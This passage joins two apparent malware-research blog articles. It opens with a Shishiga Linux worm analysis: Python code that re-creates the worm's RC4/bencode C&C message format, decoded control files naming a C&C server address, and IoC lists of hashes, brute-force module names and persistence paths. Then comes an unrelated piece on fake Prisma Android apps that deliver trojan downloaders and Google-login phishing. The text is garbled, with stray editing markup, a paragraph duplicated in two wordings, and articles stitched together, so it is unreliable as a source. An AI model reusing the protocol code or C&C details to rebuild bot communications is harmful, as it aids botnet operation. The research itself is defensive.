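        pairs = sorted((k.encode() if isinstance(k, str) else k, v) for k, v in obj.items())
        return b"d" + b"".join(bencode(k) + bencode(v) for k, v in pairs) + b"e"
    raise TypeError("cannot bencode %r" % type(obj))


def bdecode(data, pos=0):
    """Minimal bencode decoder; returns (value, next_pos). Strings come back as bytes."""
    c = data[pos:pos + 1]
    if c == b"i":
        end = data.index(b"e", pos)
        return int(data[pos + 1:end]), end + 1
    if c in (b"l", b"d"):
        items, pos = [], pos + 1
        while data[pos:pos + 1] != b"e":
            item, pos = bdecode(data, pos)
            items.append(item)
        if c == b"l":
            return items, pos + 1
        return dict(zip(items[0::2], items[1::2])), pos + 1
    if c.isdigit():
        colon = data.index(b":", pos)
        n = int(data[pos:colon])
        return data[colon + 1:colon + 1 + n], colon + 1 + n
    raise ValueError("bad bencode at offset %d" % pos)


def encode_message(obj, key=None):
    """Mirror of httpproto.encode(): key || RC4(key, CRC32_LE(msg) || msg), msg = bencode(obj)."""
    msg = bencode(obj)
    crc = struct.pack("<I", zlib.crc32(msg) & 0xFFFFFFFF)
    k = key if key is not None else struct.pack("<I", random.getrandbits(32))  # 4-byte key (assumed)
    return k + rc4(k, crc + msg)


def decode_message(blob):
    """Inverse: peel the 4-byte key, RC4-decrypt, verify the CRC; None if anything is off."""
    if len(blob) < 8:
        return None
    body = rc4(blob[:4], blob[4:])
    expected, msg = struct.unpack("<I", body[:4])[0], body[4:]
    if zlib.crc32(msg) & 0xFFFFFFFF != expected:
        return None               # tampered, truncated, or not this format at all
    try:
        obj, _ = bdecode(msg)
    except (ValueError, IndexError):
        return None
    return obj


def parse_bt(bt_bytes):
    """Decode a .bt control file; 'v' holds one 'sha1,filename' line per payload."""
    d, _ = bdecode(bt_bytes)
    entries = []
    for line in d[b"v"].decode("utf-8", errors="replace").splitlines():
        line = line.strip()
        if "," in line:
            sha1, name = line.split(",", 1)
            entries.append((sha1, name))
    return {"salt": d[b"salt"].decode(), "seq": d[b"seq"], "entries": entries}


# Constructed sample modelled on the update.bt listing in the article; sig/k are placeholders.
SAMPLE_UPDATE_BT = bencode({
    "sig": b"\x00" * 64, "k": b"\x00" * 32, "salt": "update", "seq": 1486885364,
    "v": "bf4d9e25fc210a1d9809aebb03b30748dd588d08,mipsel.lm\n"
         "8a0d58472f6166ade0ae677bab7940fe38d66d35,armv4l.lm\n",
})

if __name__ == "__main__":
    wire = encode_message({"os": "lin", "arch": "i686"})
    print("wire:", wire.hex())
    print("decoded:", decode_message(wire))
    print("update.bt:", parse_bt(SAMPLE_UPDATE_BT))
```

Note that the 4-byte RC4 key travels in clear at the front of every message, so the scheme gives integrity against accidental corruption (the CRC) but no confidentiality from anyone holding the traffic; that is what makes decoding captured C&C exchanges straightforward.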

script.bt
{
    'sig': <removed>, (1)
    'k': <removed>, (2)
    'salt': 'script',
    'seq': 1486885364,
    'v': 'caba4dbe2f7add9371b94b97cf0d351b72449072,test.lua\n'
}
(1)signature
(2)public key
update.bt
{
    'sig': <removed>,
    'k': <removed>,
    'salt': 'update',
    'seq': 1486885364,
    'v':
        'bf4d9e25fc210a1d9809aebb03b30748dd588d08,mipsel.lm\n
        8a0d58472f6166ade0ae677bab7940fe38d66d35,armv4l.lm\n
        51a4ca78ebb0649721ae472290bea7bfe983d727,mips.lm\n
        979fb376d6adc65473c4f51ad1cc36e3612a1e73,powerpc.lm\n
        ce4b3c92a96137e6215a5e2f5fd28a672eddaaab,i686.lm\n'
}
server.bt
{
    'sig': <removed>,
    'k': <removed>,
    'salt': 'server',
    'seq': 1486835166,
    'v': '93.117.137.35:8080\n'
}

Finally, the server.lua module's main functionality is to create an HTTP server on the port defined in config.lua. In all samples we have analyzed so far, that is port 8888.

The server responds only to /info and /upload requests. Below is a (prettified) version of the server response to the /info path. All of the files below can be easily downloaded from the infected device.

{
    "src":[ (1)
        "test.lua",
        "test1.lua",
        "test10.lua",
        "test2.lua",
        "test3.lua",
        "test5.lua",
        "test6.lua",
        "test_1.lua",
        "test_2.lua",
        "test_3.lua",
        "test_4.lua"
    ],
    "dm":[ (2)
        "armv4l.dm",
        "i686.dm",
        "mips.dm",
        "mipsel.dm"
    ],
    "bt":[ (3)
        "script.bt",
        "server.bt",
        "update.bt"
    ],
    "version":"1.0.0", (4)
    "lua":[ (5)
        "armv4l.lm",
        "i686.lm",
        "mips.lm",
        "mipsel.lm",
        "powerpc.lm"
    ],
    "os":"lin",
    "arch":"i686",
    "lua_version":"Lua 5.3"
}
(1)Lua scripts
(2)backdoor (old name: .dl)
(3)BitTorrent scripts
(4)malware version
(5)modules loader

Querying the root / on port 8888 will result in HTTP/1.0 404 OK, which serves as a simple indicator of compromise (IoC).

http.lua response function
function http.response(req,code,data,timeout)
    timeout=timeout or timeoutDef
    local hdr="HTTP/1.0 %d OK\r\nContent-Length: %d\r\nConnection: close\r\n\r\n"
    async.sendall(req.sock,hdr:format(code,data:len())..data,timeout)
    return true
end

At this point in our investigation, we asked the Censys team to do a mass scan of the Internet on TCP port 8888. They found about 10 IP addresses that match this particular HTTP answer. These IP addresses are potentially infected machines.

Conclusion

At first glance, Linux/Shishiga might appear to be like the others, spreading through weak Telnet and SSH credentials, but the use of the BitTorrent protocol and Lua modules separates it from the herd. BitTorrent used in a Mirai-inspired worm, Hajime, was observed last year, and we can only speculate that it might become more popular in the future.

It’s possible that Shishiga could still evolve and become more widespread but the low number of victims, constant adding, removing, and modifying of the components, code comments and even debug information, clearly indicate that it’s a work in progress. To prevent your devices from being infected by Shishiga and similar worms, you should not use default Telnet and SSH credentials.

We would like to thank the Censys team for their collaboration.

IoCs

C&C

93.117.137.35

SHA-1 hashes (.lm)
SHA-1 hashes (.dl)
274181d2f9c6b8f0e217db23f1d39aa94c161d6e
8abbb049bffd679686323160ca4b6a86184550a1
95444c2ccc5fff19145d60f1e817fd682cabe0cd
9cde845852653339f67667c2408126f02f246949
Lua’s scripts filename
async.lua
async.lua.old
bencode.lua
bfssh.lua
bfssh.lua.old2
bftelnet.lua
btloader.lua
callhome.lua
callhome.lua.old
config.lua
crypto.lua
dht.lua
event.lua
evs.lua
http.lua
httpproto.lua
libevent2.lua
luaevent.lua
main.lua
main2.lua
malware.lua
persist.lua
readme.lua
routing.lua
scanner.lua
scanner2.lua
server.lua
socket.lua
socks.lua
ssh.lua
ssl.lua
telnet.lua
test.lua
test1.lua
test10.lua
test2.lua
test3.lua
test5.lua
test6.lua
threads.lua
torrent.lua
udp.lua
utils.lua
worm.lua
Files that could potentially indicate an infection
/tmp/.local/*
/tmp/drop
/tmp/srv
$HOME/.local/ssh.txt
$HOME/.local/telnet.txt
$HOME/.local/nodes.cfg
$HOME/.local/check
$HOME/.local/script.bt
$HOME/.local/update.bt
$HOME/.local/server.bt
$HOME/.local/syslog
$HOME/.local/syslog.pid
$HOME/.local/{armv4l,i686,mips,mipsel}.{dl,dm}
$HOME/.local/{armv4l,i686,mips,mipsel,powerpc}.lm
/etc/rc2.d/S04syslogd
/etc/rc3.d/S04syslogd
/etc/rc4.d/S04syslogd
/etc/rc5.d/S04syslogd
/etc/init.d/syslogd
/bin/syslogd
/etc/cron.hourly/syslogd

Fake Prisma apps found on Google Play

Before the release of the Android version of Prisma, a popular photo transformation app, fake Prisma apps flooded the Google Play Store.

ESET researchers discovered fake Prisma apps of different types, including several dangerous trojan downloaders. The Google Play security team removed them from the official Android store at ESET’s notice. Prior to that point, Prisma copycats reached over 1.5 million downloads by fans.

Prisma is a unique photo editor released by Prisma labs, Inc. First released for iOS, it received excellent ratings among users on iTunes, the Apple app store. Android users were eager for it and many couldn’t wait to see it on Google Play where Prisma’s release was scheduled for July 24th, 2016.

As with many other popular apps on Google Play in the past, fake versions flooded the store before the official release date, riding the wave of user impatience.

Fake Prisma apps' functionality
</gr_replreplace>

<gr_replace lines="1176" cat="clarify" orig="The most dangerous">
The most dangerous fake Prisma apps found on Google Play before the (genuine) Prisma app release were the trojan downloaders detected by ESET as Android/TrojanDownloader.Agent.GY. In contrast to their counterparts with their annoying ads and surveys, these trojans work behind the scenes, hiding their icons on the device.

Most of the fake Prisma apps found on Google Play didn’t have any photo editing functionality; instead they only displayed ads or fake surveys, luring users into providing their personal information or subscribing to bogus (and costly) SMS services. Some actually had very basic photo editing functionality but mainly served the user a stream of pop-up ads or displayed scareware activity to persuade the user the device was infected with malware.

Fake apps

Figure 1: Scareware activity displayed after launch

The most dangerous fake Prisma apps found on Google Play before the (genuine) Prisma app release were the trojan downloaders detected by ESET asAndroid/TrojanDownloader.Agent.GY. Contrary to their counterparts with their annoying ads and surveys, these trojans work behind the scenes hiding their icons from the device.

They would send device information to the C&C server and on request, download additional modules and execute them. When we replicated this infiltration, the trojan downloaded and executed an additional module stealing sensitive information such as phone number, operator name, country name, language and so on. However, downloaded modules may have had different functionality implemented.

Among the five trojan downloaders discovered on Google Play, two have phishing functionality implemented that could probably be executed via the downloaded module. Displaying a fake request to update the device’s operating system to Android 6.0, users are lured into entering their Google account credentials into the fake login form.

Figure 2: Phishing activity


Text translated:

Для обновления вашего устройства необходимо авторизоваться!

Ваша версия Android:

Доступная версия: 6.0

“To update your device, you must login!
Your version of Android:
Available version: 6.0”

Один аккаунт. Весь мир Google!

Подождите, идет проверка…

“One account. Google whole world!

Wait, there is a check…”

Because of their download capabilities, the Android/TrojanDownloader.Agent.GY family of malware poses a serious risk to the more than 10,000 Android users who installed these dangerous apps before they were pulled from the Google Play store.

Figure 3: Trojans found on Google Play


Just before the release …

Because of Prisma’s success on the iOS platform, it was clear that this app would be eagerly awaited by Android users. Such situations often attract bad guys who put out fake apps – either copycats or various derivatives, from tutorials to cheats – on Google Play to ride the wave of excitement. Using misleading icons, app names, developer’s names and/or fake reviews, they make money from displaying ads, fake clicks, money scams … or, at worst, ransomware, delivered to the victim via a downloader trojan.

In the past, we've witnessed a lot of cases of apps riding the wave of popularity on Google Play. The latest examples were fakes of the Pokémon Go app. GTA 5 fans were also targeted by fake apps before the famous game's official release, and the same pattern was observed in connection with the popular MSQRD app, which arrived with numerous copycats on the Google Play store. Many other popular apps – such as My Talking Angela, Dubsmash or Subway Surfers – were preceded by copycat porn clickers.

Conclusion

Trying to download a popular app before its official release is a really bad idea, as the chances of downloading a genuine app are slim while the risk of downloading a malicious copycat is large. This is true even on Google Play, with all of the tech giant's security mechanisms behind it. For users it is difficult to determine whether a given app is genuine or not. Bad guys often use very similar icons, app names, descriptions and even screenshots to confuse users.


Figure 4: Example of a fake app (right) mimicking the original (left)


Expert advice from ESET

Follow the basic rules of Android app hygiene:

  • Download only from reputable sources
  • Check user reviews and focus on the negative ones (bear in mind that positive ones may be fabricated)
  • Read the app's terms and conditions and pay attention to the permissions it requests
  • Use a quality mobile security solution

When there is hype around an app you want, also consider the following advice:

  • Expect that you may run into copycats alongside the original app, and be more careful than usual
  • Thoroughly check the app name and the developer name: they must match exactly, not merely resemble what you expect